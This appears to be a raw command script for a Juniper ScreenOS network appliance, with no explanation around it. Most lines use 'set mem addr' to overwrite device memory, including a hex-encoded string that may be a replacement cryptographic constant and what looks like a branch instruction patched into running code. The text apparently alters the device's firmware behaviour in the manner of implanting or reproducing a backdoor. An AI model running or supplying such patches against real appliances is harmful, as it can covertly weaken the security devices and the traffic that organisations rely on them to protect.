set mem addr 0x19603d4 0x000636f0
ping
set mem addr 0x1a81b88 0x4d333241
set mem addr 0x1a81b8c 0x3732432c
set mem addr 0x1a81b90 0x3031653a
set mem addr 0x1a81b94 0x33443230
set mem addr 0x1a81b98 0x30303334
set mem addr 0x1a81b9c 0x33383630
set mem addr 0x1a81ba0 0x34383030
set mem addr 0x1a81ba4 0x62303639
set mem addr 0x1a81ba8 0x33336138
set mem addr 0x1a81bac 0x33643230
set mem addr 0x1a81bb0 0x30303661
set mem addr 0x1a81bb4 0x36313239
set mem addr 0x1a81bb8 0x38633830
set mem addr 0x1a81bbc 0x37643238
set mem addr 0x1a81bc0 0x30336136
set mem addr 0x1a81bc4 0x34653830
set mem addr 0x1a81bc8 0x30303230
set mem addr 0x1a81bcc 0x00000000
set mem addr 0x19603d4 0x0032a578
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x19603d4 0x000636f0
get tech | in juniper
ping
set mem addr 0x342a5c 0x48000014
set mem addr 0x19603d4 0x006516ac
